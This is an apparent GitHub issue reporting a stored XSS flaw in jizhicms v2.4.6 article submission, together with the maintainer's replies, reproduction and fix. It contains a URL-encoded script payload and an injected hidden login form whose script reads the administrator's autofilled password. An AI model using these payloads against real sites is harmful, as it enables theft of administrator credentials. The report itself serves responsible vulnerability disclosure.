jizhicms v2.4.6 has a XSS vulnerability in the post article
Closed this issue · 5 comments
The content of the article published in the front end is only filtered in the front end, without being filtered in the background, which allows attackers to publish an article containing malicious JavaScript scripts by modifying the request package. However, the backend administrator clicking on the article preview will launch this malicious JavaScript script
When submitting, you can see that the post request sent is:
Modify the submitted content to:
%3Cp%3Etest%3C%2Fp%3E%3Cp%3E%3Cscript%3Ealert('xss')%3C%2Fscript%3E
At this point, if the administrator previews the submitted article, a pop-up window will appear
At this point, it indicates that the embedded JavaScript script has been maliciously executed
I know that the entire system's cookies have been set to HttpOnly, which makes it impossible to obtain cookies through JavaScript scripts. However, if the administrator has enabled the browser's "automatic password filling" function, then the attacker can construct the following JavaScript script to obtain the administrator's plaintext password:
<p>test</p>
<form method="post" class="layui-form" onsubmit="return false;" hidden>
<input name="cache" id="cache" type="hidden" value="" />
<select name="lang" lay-filter="lang">
<option value="">选择语言</option>
<option selected value="zh_cn">中文简体</option>
<option value="zh_cht">中文繁体</option>
</select>
<hr class="hr15">
<input name="username" placeholder="用户名" type="text" lay-verify="required" class="layui-input" >
<hr class="hr15">
<input name="password" lay-verify="required" placeholder="密码" type="password" class="layui-input">
<hr class="hr15">
<input value="登录" lay-submit lay-filter="login" style="width:100%;" type="submit">
<hr class="hr20" >
</form>
<script>
setTimeout(function() {
const password = document.getElementsByName('password')[0].value;
alert(`the password is:${password}`);
}, 5000);
</script>
Submit the script after URL encoding
Administrator clicks on preview:
Here, the password plaintext has been pop-up displayed through the JavaScript script. If the pop-up function is modified to send the password plaintext to the attacker's server, the attacker will successfully obtain the administrator's plaintext password without the administrator's awareness
Modification suggestions:
Please filter the content of the article on the backend
你好,我尝试了一下,没有发现这个问题,请将你的这个测试发送到 demo.jizhicms.cn 上面,谢谢。
我找到了类似的问题,有人已经发布上去了,并没有出现问题:https://demo.jizhicms.cn/news/630.html
我找到了类似的问题,有人已经发布上去了,并没有出现问题:https://demo.jizhicms.cn/news/630.html
Sorry,The webpage you provided me cannot be opened due to a 404 error
But I published an article called ’xsstest‘ and successfully executed the pop-up window by modifying the request package
In the preview interface, it is possible to pop up a window
However, since I do not have approval and preview permissions in the backend interface, I am unable to conduct testing. However, since pop-up windows can occur in the preview of ordinary users in the backend, they should also occur in the preview of super administrators in the backend
Good job !
非常厉害,但是我按照你的方式操作了一下,完美复现了效果!我将在近期修复这个bug,感谢!
已修复